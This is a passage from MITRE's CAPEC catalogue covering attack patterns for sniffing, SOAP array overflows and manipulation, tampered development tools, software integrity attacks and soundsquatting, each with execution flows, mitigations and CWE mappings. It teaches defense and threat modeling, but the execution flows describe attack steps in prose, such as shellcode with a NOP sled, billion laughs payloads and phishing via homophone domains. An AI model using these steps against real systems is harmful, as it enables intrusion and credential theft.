The attacker needs to setup a sniffer for a sufficient period of time so as to capture meaningful quantities of code. The presence of the sniffer should not be detected on the network. Also if the attacker plans to employ an adversary-in-the-middle attack (CAPEC-94), the client or server must not realize this. Finally, the attacker needs to regenerate source code from binary code if the need be.

Resources Required

The Attacker needs the ability to capture communications between the client being updated and the server providing the update.

In the case that encryption obscures client/server communication the attacker will either need to lift key material from the client.

Consequences

Scope	Impact	Likelihood
Confidentiality	Read Data
Confidentiality Access Control Authorization	Gain Privileges

Mitigations

Design: Encrypt all communication between the client and server.

Implementation: Use SSL, SSH, SCP.

Operation: Use "ifconfig/ipconfig" or other tools to detect the sniffer installed in the network.

Example Instances

Attacker receives notification that the computer/OS/application has an available update, loads a network sniffing tool, and extracts update data from subsequent communication. The attacker then proceeds to reverse engineer the captured stream to gain sensitive information, such as encryption keys, validation algorithms, applications patches, etc..

Plain code, such as applets or JavaScript, is also part of the executing application. If such code is transmitted unprotected, the attacker can capture the code and possibly reverse engineer it to gain sensitive information, such as encryption keys, validation algorithms and such.

Related Weaknesses

CWE-ID	Weakness Name
319	Cleartext Transmission of Sensitive Information
311	Missing Encryption of Sensitive Data
318	Cleartext Storage of Sensitive Information in Executable
693	Protection Mechanism Failure

Taxonomy Mappings

Relevant to the ATT&CK taxonomy mapping

Entry ID	Entry Name
1040	Network Sniffing

Content History

Submissions
Submission Date	Submitter	Organization
2014-06-23 (Version 2.6)	CAPEC Content Team	The MITRE Corporation
2014-06-23 (Version 2.6)
Modifications
Modification Date	Modifier	Organization
2015-11-09 (Version 2.7)	CAPEC Content Team	The MITRE Corporation
2015-11-09 (Version 2.7)	Updated Description Summary, Related_Attack_Patterns
2015-12-07 (Version 2.8)	CAPEC Content Team	The MITRE Corporation
2015-12-07 (Version 2.8)	Updated Description Summary
2017-01-09 (Version 2.9)	CAPEC Content Team	The MITRE Corporation
2017-01-09 (Version 2.9)	Updated Related_Attack_Patterns
2020-07-30 (Version 3.3)	CAPEC Content Team	The MITRE Corporation
2020-07-30 (Version 3.3)	Updated Prerequisites
2021-06-24 (Version 3.5)	CAPEC Content Team	The MITRE Corporation
2021-06-24 (Version 3.5)	Updated Related_Weaknesses, Skills_Required
2021-10-21 (Version 3.6)	CAPEC Content Team	The MITRE Corporation
2021-10-21 (Version 3.6)	Updated Execution_Flow
2022-09-29 (Version 3.8)	CAPEC Content Team	The MITRE Corporation
2022-09-29 (Version 3.8)	Updated Taxonomy_Mappings
Previous Entry Names
Change Date	Previous Entry Name
2015-12-07 (Version 2.8)	Passively Sniff and Capture Application Code Bound for Authorized Client

CAPEC-157: Sniffing Attacks

Attack Pattern ID: 157

Abstraction: Standard

View customized information:

Description

Typical Severity

Medium

Relationships

Nature	Type	ID	Name
ChildOf	Meta Attack Pattern - A meta level attack pattern in CAPEC is a decidedly abstract characterization of a specific methodology or technique used in an attack. A meta attack pattern is often void of a specific technology or implementation and is meant to provide an understanding of a high level approach. A meta level attack pattern is a generalization of related group of standard level attack patterns. Meta level attack patterns are particularly useful for architecture and design level threat modeling exercises.	117	Interception
ParentOf	Detailed Attack Pattern - A detailed level attack pattern in CAPEC provides a low level of detail, typically leveraging a specific technique and targeting a specific technology, and expresses a complete execution flow. Detailed attack patterns are more specific than meta attack patterns and standard attack patterns and often require a specific protection mechanism to mitigate actual attacks. A detailed level attack pattern often will leverage a number of different standard level attack patterns chained together to accomplish a goal.	31	Accessing/Intercepting/Modifying HTTP Cookies
ParentOf	Detailed Attack Pattern - A detailed level attack pattern in CAPEC provides a low level of detail, typically leveraging a specific technique and targeting a specific technology, and expresses a complete execution flow. Detailed attack patterns are more specific than meta attack patterns and standard attack patterns and often require a specific protection mechanism to mitigate actual attacks. A detailed level attack pattern often will leverage a number of different standard level attack patterns chained together to accomplish a goal.	57	Utilizing REST's Trust in the System Resource to Obtain Sensitive Data
ParentOf	Detailed Attack Pattern - A detailed level attack pattern in CAPEC provides a low level of detail, typically leveraging a specific technique and targeting a specific technology, and expresses a complete execution flow. Detailed attack patterns are more specific than meta attack patterns and standard attack patterns and often require a specific protection mechanism to mitigate actual attacks. A detailed level attack pattern often will leverage a number of different standard level attack patterns chained together to accomplish a goal.	65	Sniff Application Code
ParentOf	Detailed Attack Pattern - A detailed level attack pattern in CAPEC provides a low level of detail, typically leveraging a specific technique and targeting a specific technology, and expresses a complete execution flow. Detailed attack patterns are more specific than meta attack patterns and standard attack patterns and often require a specific protection mechanism to mitigate actual attacks. A detailed level attack pattern often will leverage a number of different standard level attack patterns chained together to accomplish a goal.	158	Sniffing Network Traffic
ParentOf	Detailed Attack Pattern - A detailed level attack pattern in CAPEC provides a low level of detail, typically leveraging a specific technique and targeting a specific technology, and expresses a complete execution flow. Detailed attack patterns are more specific than meta attack patterns and standard attack patterns and often require a specific protection mechanism to mitigate actual attacks. A detailed level attack pattern often will leverage a number of different standard level attack patterns chained together to accomplish a goal.	609	Cellular Traffic Intercept
CanPrecede	Standard Attack Pattern - A standard level attack pattern in CAPEC is focused on a specific methodology or technique used in an attack. It is often seen as a singular piece of a fully executed attack. A standard attack pattern is meant to provide sufficient details to understand the specific technique and how it attempts to accomplish a desired goal. A standard level attack pattern is a specific type of a more abstract meta level attack pattern.	652	Use of Known Kerberos Credentials

This table shows the views that this attack pattern belongs to and top level categories within that view.

View Name	Top Level Categories
Domains of Attack	Software, Communications
Mechanisms of Attack	Collect and Analyze Information

Execution Flow

Explore

Determine Communication Mechanism: The adversary determines the nature and mechanism of communication between two components, looking for opportunities to exploit.
Techniques
Look for application documentation that might describe a communication mechanism used by a target.

Experiment

Position In Between Targets: The adversary positions themselves somewhere in the middle of the two components. If the communication is encrypted, the adversary will need to act as a proxy and route traffic between the components, exploiting a flaw in the encryption mechanism. Otherwise, the adversary can just observe the communication at either end.

Techniques
Use Wireshark or some other packet capturing tool to capture traffic on a network.
Install spyware on a client that will intercept outgoing packets and route them to their destination as well as route incoming packets back to the client.
Exploit a weakness in an encrypted communication mechanism to gain access to traffic. Look for outdated mechanisms such as SSL.

Exploit

Listen to Communication: The adversary observes communication, but does not alter or block it. The adversary gains access to sensitive information and can potentially utilize this information in a malicious way.

Prerequisites

The target data stream must be transmitted on a medium to which the adversary has access.

Resources Required

The adversary must be able to intercept the transmissions containing the data of interest. Depending on the medium of transmission and the path the data takes between the sender and recipient, the adversary may require special equipment and/or require that this equipment be placed in specific locations (e.g., a network sniffing tool)

Consequences

Scope	Impact	Likelihood
Confidentiality	Read Data

Mitigations

Encrypt sensitive information when transmitted on insecure mediums to prevent interception.

Related Weaknesses

CWE-ID	Weakness Name
311	Missing Encryption of Sensitive Data

Content History

Submissions
Submission Date	Submitter	Organization
2014-06-23 (Version 2.6)	CAPEC Content Team	The MITRE Corporation
2014-06-23 (Version 2.6)
Modifications
Modification Date	Modifier	Organization
2015-12-07 (Version 2.8)	CAPEC Content Team	The MITRE Corporation
2015-12-07 (Version 2.8)	Updated Related_Attack_Patterns
2018-07-31 (Version 2.12)	CAPEC Content Team	The MITRE Corporation
2018-07-31 (Version 2.12)	Updated Activation_Zone, Attack_Motivation-Consequences, Attack_Prerequisites, Description Summary, Injection_Vector, Payload, Payload_Activation_Impact, Resources_Required, Solutions_and_Mitigations
2019-09-30 (Version 3.2)	CAPEC Content Team	The MITRE Corporation
2019-09-30 (Version 3.2)	Updated Description
2020-07-30 (Version 3.3)	CAPEC Content Team	The MITRE Corporation
2020-07-30 (Version 3.3)	Updated Related_Attack_Patterns
2020-12-17 (Version 3.4)	CAPEC Content Team	The MITRE Corporation
2020-12-17 (Version 3.4)	Updated Related_Attack_Patterns
2021-06-24 (Version 3.5)	CAPEC Content Team	The MITRE Corporation
2021-06-24 (Version 3.5)	Updated Description
2022-02-22 (Version 3.7)	CAPEC Content Team	The MITRE Corporation
2022-02-22 (Version 3.7)	Updated Execution_Flow

CAPEC-158: Sniffing Network Traffic

Attack Pattern ID: 158

Abstraction: Detailed

View customized information:

Description

Typical Severity

Medium

Relationships

Nature	Type	ID	Name
ChildOf	Standard Attack Pattern - A standard level attack pattern in CAPEC is focused on a specific methodology or technique used in an attack. It is often seen as a singular piece of a fully executed attack. A standard attack pattern is meant to provide sufficient details to understand the specific technique and how it attempts to accomplish a desired goal. A standard level attack pattern is a specific type of a more abstract meta level attack pattern.	157	Sniffing Attacks
CanFollow	Standard Attack Pattern - A standard level attack pattern in CAPEC is focused on a specific methodology or technique used in an attack. It is often seen as a singular piece of a fully executed attack. A standard attack pattern is meant to provide sufficient details to understand the specific technique and how it attempts to accomplish a desired goal. A standard level attack pattern is a specific type of a more abstract meta level attack pattern.	697	DHCP Spoofing

This table shows the views that this attack pattern belongs to and top level categories within that view.

View Name	Top Level Categories
Domains of Attack	Software, Communications
Mechanisms of Attack	Collect and Analyze Information

Prerequisites

The target must be communicating on a network protocol visible by a network sniffing application.

The adversary must obtain a logical position on the network from intercepting target network traffic is possible. Depending on the network topology, traffic sniffing may be simple or challenging. If both the target sender and target recipient are members of a single subnet, the adversary must also be on that subnet in order to see their traffic communication.

Skills Required

[Level: Low]

Adversaries can obtain and set up open-source network sniffing tools easily.

Resources Required

A tool with the capability of presenting network communication traffic (e.g., Wireshark, tcpdump, Cain and Abel, etc.).

Consequences

Scope	Impact	Likelihood
Confidentiality	Read Data

Mitigations

Obfuscate network traffic through encryption to prevent its readability by network sniffers.

Employ appropriate levels of segmentation to your network in accordance with best practices.

Related Weaknesses

CWE-ID	Weakness Name
311	Missing Encryption of Sensitive Data

Taxonomy Mappings

Relevant to the ATT&CK taxonomy mapping

Entry ID	Entry Name
1040	Network Sniffing
1111	Multi-Factor Authentication Interception

Content History

Submissions
Submission Date	Submitter	Organization
2014-06-23 (Version 2.6)	CAPEC Content Team	The MITRE Corporation
2014-06-23 (Version 2.6)
Modifications
Modification Date	Modifier	Organization
2015-11-09 (Version 2.7)	CAPEC Content Team	The MITRE Corporation
2015-11-09 (Version 2.7)	Updated References
2015-12-07 (Version 2.8)	CAPEC Content Team	The MITRE Corporation
2015-12-07 (Version 2.8)	Updated Description Summary, Related_Attack_Patterns
2017-08-04 (Version 2.11)	CAPEC Content Team	The MITRE Corporation
2017-08-04 (Version 2.11)	Updated Resources_Required
2018-07-31 (Version 2.12)	CAPEC Content Team	The MITRE Corporation
2018-07-31 (Version 2.12)	Updated Activation_Zone, Attack_Motivation-Consequences, Attack_Prerequisites, Attacker_Skills_or_Knowledge_Required, Description Summary, Injection_Vector, Payload, Payload_Activation_Impact, Resources_Required, Solutions_and_Mitigations
2022-09-29 (Version 3.8)	CAPEC Content Team	The MITRE Corporation
2022-09-29 (Version 3.8)	Updated Taxonomy_Mappings

CAPEC-493: SOAP Array Blowup

Attack Pattern ID: 493

Abstraction: Standard

View customized information:

Description

Relationships

Nature	Type	ID	Name
ChildOf	Meta Attack Pattern - A meta level attack pattern in CAPEC is a decidedly abstract characterization of a specific methodology or technique used in an attack. A meta attack pattern is often void of a specific technology or implementation and is meant to provide an understanding of a high level approach. A meta level attack pattern is a generalization of related group of standard level attack patterns. Meta level attack patterns are particularly useful for architecture and design level threat modeling exercises.	130	Excessive Allocation

This table shows the views that this attack pattern belongs to and top level categories within that view.

View Name	Top Level Categories
Domains of Attack	Software
Mechanisms of Attack	Abuse Existing Functionality

Prerequisites

This type of an attack requires the attacker to know the endpoint of the web service, and be able to reach the endpoint with a malicious SOAP message.

Mitigations

Enforce strict schema validation. The schema should enforce a maximum number of array elements. If the number of maximum array elements can't be limited another validation method should be used. One such method could be comparing the declared number of items in the array with the existing number of elements of the array. If these numbers don't match drop the SOAP packet at the web service layer.

Related Weaknesses

CWE-ID	Weakness Name
770	Allocation of Resources Without Limits or Throttling

Taxonomy Mappings

Relevant to the ATT&CK taxonomy mapping (see parent )

References

[REF-422] "SOAP Array Attack". <http://www.ws-attacks.org/index.php/Soap_Array_Attack>.

Content History

Submissions
Submission Date	Submitter	Organization
2014-06-23 (Version 2.6)	CAPEC Content Team	The MITRE Corporation
2014-06-23 (Version 2.6)
Modifications
Modification Date	Modifier	Organization
2019-04-04 (Version 3.1)	CAPEC Content Team	The MITRE Corporation
2019-04-04 (Version 3.1)	Updated Related_Weaknesses
2019-09-30 (Version 3.2)	CAPEC Content Team	The MITRE Corporation
2019-09-30 (Version 3.2)	Updated Related_Attack_Patterns

CAPEC-256: SOAP Array Overflow

Attack Pattern ID: 256

Abstraction: Detailed

View customized information:

Description

Typical Severity

High

Relationships

Nature	Type	ID	Name
ChildOf	Standard Attack Pattern - A standard level attack pattern in CAPEC is focused on a specific methodology or technique used in an attack. It is often seen as a singular piece of a fully executed attack. A standard attack pattern is meant to provide sufficient details to understand the specific technique and how it attempts to accomplish a desired goal. A standard level attack pattern is a specific type of a more abstract meta level attack pattern.	100	Overflow Buffers

This table shows the views that this attack pattern belongs to and top level categories within that view.

View Name	Top Level Categories
Domains of Attack	Software
Mechanisms of Attack	Manipulate Data Structures

Execution Flow

Explore

Identify target application: The adversary identifies a target application to perform the buffer overflow on. In this attack, adversaries look for applications that utilize SOAP as a communication mechanism.

Experiment

Find injection vector: The adversary identifies an injection vector to deliver the excessive content to the targeted application's buffer.

Techniques
The adversary creates a SOAP message that incorrectly specifies the size of its array to be smaller than the size of the actual content by a large margin and sends it to the application. If this causes a crash or some unintended behavior, it is likely that this is a valid injection vector.

Techniques
Create malicious shellcode that will execute when the program execution is returned to it.
Use a NOP-sled in the overflow content to more easily "slide" into the malicious code. This is done so that the exact return address need not be correct, only in the range of all of the NOPs
The adversary will choose a SOAP type that allows them to put shellcode into the buffer when the array is read into the application.

Exploit

Overflow the buffer: Using the injection vector, the adversary sends the crafted SOAP message to the program, overflowing the buffer.

Prerequisites

The targeted SOAP server must trust that the array size as stated in messages it receives is correct, but read through the entire content of the message regardless of the stated size of the array.

Resources Required

The attacker must be able to craft malformed SOAP messages, specifically, messages with arrays where the stated array size understates the actual size of the array in the message.

Mitigations

If the server either verifies the correctness of the stated array size or if the server stops processing an array once the stated number of elements have been read, regardless of the actual array size, then this attack will fail. The former detects the malformed SOAP message while the latter ensures that the server does not attempt to load more data than was allocated for.

Related Weaknesses

CWE-ID	Weakness Name
805	Buffer Access with Incorrect Length Value

Taxonomy Mappings

Relevant to the WASC taxonomy mapping

Entry ID	Entry Name
35	SOAP Array Abuse

References

[REF-102] Robin Cover, ed.. "XML and Web Services In The News". XML Daily Newslink. <http://www.xml.org/xml/news/archives/archive.11292006.shtml>.

[REF-103] "Simple Object Access Protocol (SOAP) 1.1". 5.4.2 Arrays. W3C. 2006-11-29. <http://www.w3.org/TR/2000/NOTE-SOAP-20000508/#_Toc478383522>.

Content History

Submissions
Submission Date	Submitter	Organization
2014-06-23 (Version 2.6)	CAPEC Content Team	The MITRE Corporation
2014-06-23 (Version 2.6)
Modifications
Modification Date	Modifier	Organization
2017-08-04 (Version 2.11)	CAPEC Content Team	The MITRE Corporation
2017-08-04 (Version 2.11)	Updated Related_Attack_Patterns
2019-04-04 (Version 3.1)	CAPEC Content Team	The MITRE Corporation
2019-04-04 (Version 3.1)	Updated Related_Weaknesses
2020-12-17 (Version 3.4)	CAPEC Content Team	The MITRE Corporation
2020-12-17 (Version 3.4)	Updated Taxonomy_Mappings
2021-10-21 (Version 3.6)	CAPEC Content Team	The MITRE Corporation
2021-10-21 (Version 3.6)	Updated Description, Execution_Flow

CAPEC-279: SOAP Manipulation

Attack Pattern ID: 279

Abstraction: Detailed

View customized information:

Description

Likelihood Of Attack

Medium

Typical Severity

High

Relationships

Nature	Type	ID	Name
ChildOf	Standard Attack Pattern - A standard level attack pattern in CAPEC is focused on a specific methodology or technique used in an attack. It is often seen as a singular piece of a fully executed attack. A standard attack pattern is meant to provide sufficient details to understand the specific technique and how it attempts to accomplish a desired goal. A standard level attack pattern is a specific type of a more abstract meta level attack pattern.	278	Web Services Protocol Manipulation
CanPrecede	Detailed Attack Pattern - A detailed level attack pattern in CAPEC provides a low level of detail, typically leveraging a specific technique and targeting a specific technology, and expresses a complete execution flow. Detailed attack patterns are more specific than meta attack patterns and standard attack patterns and often require a specific protection mechanism to mitigate actual attacks. A detailed level attack pattern often will leverage a number of different standard level attack patterns chained together to accomplish a goal.	110	SQL Injection through SOAP Parameter Tampering
CanPrecede	Detailed Attack Pattern - A detailed level attack pattern in CAPEC provides a low level of detail, typically leveraging a specific technique and targeting a specific technology, and expresses a complete execution flow. Detailed attack patterns are more specific than meta attack patterns and standard attack patterns and often require a specific protection mechanism to mitigate actual attacks. A detailed level attack pattern often will leverage a number of different standard level attack patterns chained together to accomplish a goal.	228	DTD Injection

This table shows the views that this attack pattern belongs to and top level categories within that view.

View Name	Top Level Categories
Domains of Attack	Software, Communications
Mechanisms of Attack	Abuse Existing Functionality

Execution Flow

Experiment

Detect Incorrect SOAP Parameter Handling: The adversary tampers with the SOAP message parameters and looks for indications that the tampering caused a change in behavior of the targeted application.

Techniques
Send more data than would seem reasonable for a field and see if the server complains.
Send nonsense data in a field that expects a certain subset, such as product names or sequence numbers, and see if the server complains.
Send XML metacharacters as data and see how the server responds.

Exploit

Find target application: The adversary needs to identify an application that uses SOAP as a communication protocol.
Techniques
Observe HTTP traffic to an application and look for SOAP headers.

Manipulate SOAP parameters: The adversary manipulates SOAP parameters in a way that causes undesirable behavior for the server. This can result in denial of service, information disclosure, arbitrary code exection, and more.

Techniques
Create a recursive XML payload that will take up all of the memory on the server when parsed, resulting in a denial of service. This is known as the billion laughs attack.
Insert XML metacharacters into data fields that could cause the server to go into an error state when parsing. This could lead to a denial of service.
Insert a large amount of data into a field that should have a character limit, causing a buffer overflow.

Prerequisites

An application uses SOAP-based web service api.

An application does not perform sufficient input validation to ensure that user-controllable data is safe for an XML parser.

The targeted server either fails to verify that data in SOAP messages conforms to the appropriate XML schema, or it fails to correctly handle the complete range of data allowed by the schema.

Consequences

Scope	Impact	Likelihood
Availability	Resource Consumption
Confidentiality	Read Data
Confidentiality Integrity Availability	Execute Unauthorized Commands

Related Weaknesses

CWE-ID	Weakness Name
707	Improper Neutralization

References

[REF-121] Navya Sidharth and Jigang Liu. "Intrusion Resistant SOAP Messaging with IAPF". IEEE. 2008-12. <http://ieeexplore.ieee.org/document/4780783/>.

Content History

Submissions
Submission Date	Submitter	Organization
2014-06-23 (Version 2.6)	CAPEC Content Team	The MITRE Corporation
2014-06-23 (Version 2.6)
Modifications
Modification Date	Modifier	Organization
2018-07-31 (Version 2.12)	CAPEC Content Team	The MITRE Corporation
2018-07-31 (Version 2.12)	Updated Attack_Motivation-Consequences, Attack_Prerequisites, Description, Description Summary, Examples-Instances, References, Related_Weaknesses, Typical_Likelihood_of_Exploit, Typical_Severity
2019-04-04 (Version 3.1)	CAPEC Content Team	The MITRE Corporation
2019-04-04 (Version 3.1)	Updated Related_Weaknesses
2020-12-17 (Version 3.4)	CAPEC Content Team	The MITRE Corporation
2020-12-17 (Version 3.4)	Updated Related_Attack_Patterns
2021-10-21 (Version 3.6)	CAPEC Content Team	The MITRE Corporation
2021-10-21 (Version 3.6)	Updated Description, Example_Instances, Execution_Flow
Previous Entry Names
Change Date	Previous Entry Name
2018-07-31 (Version 2.12)	Soap Manipulation

CAPEC-670: Software Development Tools Maliciously Altered

Attack Pattern ID: 670

Abstraction: Detailed

View customized information:

Description

Likelihood Of Attack

Low

Typical Severity

High

Relationships

Nature	Type	ID	Name
ChildOf	Standard Attack Pattern - A standard level attack pattern in CAPEC is focused on a specific methodology or technique used in an attack. It is often seen as a singular piece of a fully executed attack. A standard attack pattern is meant to provide sufficient details to understand the specific technique and how it attempts to accomplish a desired goal. A standard level attack pattern is a specific type of a more abstract meta level attack pattern.	444	Development Alteration
CanPrecede	Standard Attack Pattern - A standard level attack pattern in CAPEC is focused on a specific methodology or technique used in an attack. It is often seen as a singular piece of a fully executed attack. A standard attack pattern is meant to provide sufficient details to understand the specific technique and how it attempts to accomplish a desired goal. A standard level attack pattern is a specific type of a more abstract meta level attack pattern.	669	Alteration of a Software Update

This table shows the views that this attack pattern belongs to and top level categories within that view.

View Name	Top Level Categories
Domains of Attack	Software, Supply Chain
Mechanisms of Attack	Manipulate System Resources
Supply Chain Risks	Development and Production, Sustainment

Prerequisites

An adversary would need to have access to a targeted developer’s development environment and in particular to tools used to design, create, test and manage software, where the adversary could ensure malicious code is included in software packages built through alteration or substitution of tools in the environment used in the development of software.

Skills Required

[Level: High]

Ability to leverage common delivery mechanisms (e.g., email attachments, removable media) to infiltrate a development environment to gain access to software development tools for the purpose of malware insertion into an existing tool or replacement of an existing tool with a maliciously altered copy.

Consequences

Scope	Impact	Likelihood
Integrity	Execute Unauthorized Commands
Access Control	Gain Privileges
Confidentiality	Modify Data Read Data

Mitigations

Have a security concept of operations (CONOPS) for the development environment that includes: Maintaining strict security administration and configuration management of requirements management and database tools, software design tools, configuration management tools, compilers, system build tools, and software performance testing and load testing tools.

Avoid giving elevated privileges to developers.

Example Instances

An adversary with access to software build tools inside an Integrated Development Environment IDE alters a script used for downloading dependencies from a dependent code repository where the script has been changed to include malicious code implanted in the repository by the adversary.

Related Weaknesses

Supply Chain: CWE does not currently cover Supply Chain in the way it is presented by CAPEC. Therefore, no mapping between the two corpuses can be made at this time.

Taxonomy Mappings

Relevant to the ATT&CK taxonomy mapping

Entry ID	Entry Name
1127	Trusted Developer Utilities Proxy Execution
1195.001	Supply Chain Compromise: Compromise Software Dependencies and Development Tools

References

[REF-667] "Highly Evasive Attacker Leverages SolarWinds Supply Chain to Compromise Multiple Global Victims With SUNBURST Backdoor". Schneier on Security. 2020-12-13. <https://www.fireeye.com/blog/threat-research/2020/12/evasive-attacker-leverages-solarwinds-supply-chain-compromises-with-sunburst-backdoor.html>. URL validated: 2021-06-24.

Content History

Submissions
Submission Date	Submitter	Organization
2021-06-24 (Version 3.5)	CAPEC Content Team	The MITRE Corporation
2021-06-24 (Version 3.5)
Modifications
Modification Date	Modifier	Organization
2022-02-22 (Version 3.7)	CAPEC Content Team	The MITRE Corporation
2022-02-22 (Version 3.7)	Updated References
2022-09-29 (Version 3.8)	CAPEC Content Team	The MITRE Corporation
2022-09-29 (Version 3.8)	Updated Taxonomy_Mappings

CAPEC-184: Software Integrity Attack

Attack Pattern ID: 184

Abstraction: Meta

View customized information:

Description

Typical Severity

Low

Relationships

Nature	Type	ID	Name
ParentOf	Standard Attack Pattern - A standard level attack pattern in CAPEC is focused on a specific methodology or technique used in an attack. It is often seen as a singular piece of a fully executed attack. A standard attack pattern is meant to provide sufficient details to understand the specific technique and how it attempts to accomplish a desired goal. A standard level attack pattern is a specific type of a more abstract meta level attack pattern.	185	Malicious Software Download
ParentOf	Standard Attack Pattern - A standard level attack pattern in CAPEC is focused on a specific methodology or technique used in an attack. It is often seen as a singular piece of a fully executed attack. A standard attack pattern is meant to provide sufficient details to understand the specific technique and how it attempts to accomplish a desired goal. A standard level attack pattern is a specific type of a more abstract meta level attack pattern.	186	Malicious Software Update
ParentOf	Standard Attack Pattern - A standard level attack pattern in CAPEC is focused on a specific methodology or technique used in an attack. It is often seen as a singular piece of a fully executed attack. A standard attack pattern is meant to provide sufficient details to understand the specific technique and how it attempts to accomplish a desired goal. A standard level attack pattern is a specific type of a more abstract meta level attack pattern.	663	Exploitation of Transient Instruction Execution
ParentOf	Standard Attack Pattern - A standard level attack pattern in CAPEC is focused on a specific methodology or technique used in an attack. It is often seen as a singular piece of a fully executed attack. A standard attack pattern is meant to provide sufficient details to understand the specific technique and how it attempts to accomplish a desired goal. A standard level attack pattern is a specific type of a more abstract meta level attack pattern.	669	Alteration of a Software Update
CanFollow	Standard Attack Pattern - A standard level attack pattern in CAPEC is focused on a specific methodology or technique used in an attack. It is often seen as a singular piece of a fully executed attack. A standard attack pattern is meant to provide sufficient details to understand the specific technique and how it attempts to accomplish a desired goal. A standard level attack pattern is a specific type of a more abstract meta level attack pattern.	691	Spoof Open-Source Software Metadata

This table shows the views that this attack pattern belongs to and top level categories within that view.

View Name	Top Level Categories
Domains of Attack	Software, Supply Chain, Social Engineering
Mechanisms of Attack	Manipulate System Resources
Supply Chain Risks	Sustainment

Skills Required

[Level: Medium]

Manual or user-assisted attacks require deceptive mechanisms to trick the user into clicking a link or downloading and installing software. Automated update attacks require the attacker to host a payload and then trigger the installation of the payload code.

Resources Required

Software Integrity Attacks are usually a late stage focus of attack activity which depends upon the success of a chain of prior events. The resources required to perform the attack vary with respect to the overall attack strategy, existing countermeasures which must be bypassed, and the success of early phase attack vectors.

Related Weaknesses

CWE-ID	Weakness Name
494	Download of Code Without Integrity Check

Content History

Submissions
Submission Date	Submitter	Organization
2014-06-23 (Version 2.6)	CAPEC Content Team	The MITRE Corporation
2014-06-23 (Version 2.6)
Modifications
Modification Date	Modifier	Organization
2015-11-09 (Version 2.7)	CAPEC Content Team	The MITRE Corporation
2015-11-09 (Version 2.7)	Updated Activation_Zone, Injection_Vector, Payload, Payload_Activation_Impact, Related_Attack_Patterns
2018-07-31 (Version 2.12)	CAPEC Content Team	The MITRE Corporation
2018-07-31 (Version 2.12)	Updated Attacker_Skills_or_Knowledge_Required
Previous Entry Names
Change Date	Previous Entry Name
2015-11-09 (Version 2.7)	Software Integrity Attacks

CAPEC-631: SoundSquatting

Attack Pattern ID: 631

Abstraction: Detailed

View customized information:

Description

Alternate Terms

Term: Homophone Attack

Likelihood Of Attack

Low

Typical Severity

Medium

Relationships

Nature	Type	ID	Name
ChildOf	Standard Attack Pattern - A standard level attack pattern in CAPEC is focused on a specific methodology or technique used in an attack. It is often seen as a singular piece of a fully executed attack. A standard attack pattern is meant to provide sufficient details to understand the specific technique and how it attempts to accomplish a desired goal. A standard level attack pattern is a specific type of a more abstract meta level attack pattern.	616	Establish Rogue Location
CanFollow	Standard Attack Pattern - A standard level attack pattern in CAPEC is focused on a specific methodology or technique used in an attack. It is often seen as a singular piece of a fully executed attack. A standard attack pattern is meant to provide sufficient details to understand the specific technique and how it attempts to accomplish a desired goal. A standard level attack pattern is a specific type of a more abstract meta level attack pattern.	98	Phishing
CanPrecede	Standard Attack Pattern - A standard level attack pattern in CAPEC is focused on a specific methodology or technique used in an attack. It is often seen as a singular piece of a fully executed attack. A standard attack pattern is meant to provide sufficient details to understand the specific technique and how it attempts to accomplish a desired goal. A standard level attack pattern is a specific type of a more abstract meta level attack pattern.	89	Pharming
CanPrecede	Detailed Attack Pattern - A detailed level attack pattern in CAPEC provides a low level of detail, typically leveraging a specific technique and targeting a specific technology, and expresses a complete execution flow. Detailed attack patterns are more specific than meta attack patterns and standard attack patterns and often require a specific protection mechanism to mitigate actual attacks. A detailed level attack pattern often will leverage a number of different standard level attack patterns chained together to accomplish a goal.	543	Counterfeit Websites

This table shows the views that this attack pattern belongs to and top level categories within that view.

View Name	Top Level Categories
Domains of Attack	Social Engineering
Mechanisms of Attack	Engage in Deceptive Interactions

Execution Flow

Explore

Determine target website: The adversary first determines which website to impersonate, generally one that is trusted, receives a consistent amount of traffic, and is a homophone.
Techniques
Research popular or high traffic websites which are also homophones.

Experiment

Impersonate trusted domain: In order to impersonate the trusted domain, the adversary needs to register the SoundSquatted URL.
Techniques
Register the SoundSquatted domain.

Exploit

Deceive user into visiting domain: Finally, the adversary needs to deceive a user into visiting the SoundSquatted domain.

Techniques
Execute a phishing attack and send a user an e-mail convincing the user to click on a link leading the user to the SoundSquatted domain.
Assume that a user will unintentionally use the homophone in the URL, leading the user to the SoundSquatted domain.

Prerequisites

An adversary requires knowledge of popular or high traffic domains, that could be used to deceive potential targets.

Skills Required

[Level: Low]

Adversaries must be able to register DNS hostnames/URL’s.

Consequences

Scope	Impact	Likelihood
Other	Other

Mitigations

Authenticate all servers and perform redundant checks when using DNS hostnames.

Purchase potential SoundSquatted domains and forward to legitimate domain.

Example Instances

An adversary sends an email, impersonating the popular banking website guaranteebanking.com, to a user stating that they have just received a new deposit and to click the given link to confirm the deposit.

However, the link the in email is guarantybanking.com instead of guaranteebanking.com, which the user clicks without fully reading the link.

The user is directed to the adversary's website, which appears as if it is the legitimate guaranteebanking.com login page.

The user thinks they are logging into their account, but have actually just given their guaranteebanking.com credentials to the adversary. The adversary can now use the user's legitimate guaranteebanking.com credentials to log into the user's account and steal any money which may be in the account.

See also: SoundSquatting vulnerability allows an adversary to impersonate a trusted domain and leverages a user's confusion between the meaning of two words which are pronounced the same into visiting the malicious website to steal user credentials.

Related Weaknesses

Social Engineering: CWE does not currently cover Social Engineering in the way it is presented by CAPEC. Therefore, no mapping between the two corpuses can be made at this time.

Taxonomy Mappings

Relevant to the ATT&CK taxonomy mapping (see parent )

References

[REF-491] Nick Nikiforakis, Marco Balduzzi, Lieven Desmet, Frank Piessens and Wouter Joosen. "Soundsquatting: Uncovering the Use of Homophones in Domain Squatting". Trend Micro. <https://www.trendmicro.de/cloud-content/us/pdfs/security-intelligence/white-papers/wp-soundsquatting.pdf>.

Content History

Submissions
Submission Date	Submitter	Organization
2015-11-09 (Version 2.7)	CAPEC Content Team	The MITRE Corporation
2015-11-09 (Version 2.7)
Modifications
Modification Date	Modifier	Organization
2018-07-31 (Version 2.12)	CAPEC Content Team	The MITRE Corporation
2018-07-31 (Version 2.12)	Updated Attack_Phases
2019-04-04 (Version 3.1)	CAPEC Content Team	The MITRE Corporation
2019-04-04 (Version 3.1)	Updated Related_Attack_Patterns
2020-12-17 (Version 3.4)	CAPEC Content Team	The MITRE Corporation
2020-12-17 (Version 3.4)	Updated Related_Attack_Patterns
2022-09-29 (Version 3.8)	CAPEC Content Team	The MITRE Corporation
2022-09-29 (Version 3.8)	Updated Related_Attack_Patterns

CAPEC-163: Spear Phishing

Attack Pattern ID: 163

Abstraction: Detailed

View customized information:

Description

Likelihood Of Attack

High

Typical Severity

High

Relationships

Nature	Type	ID	Name
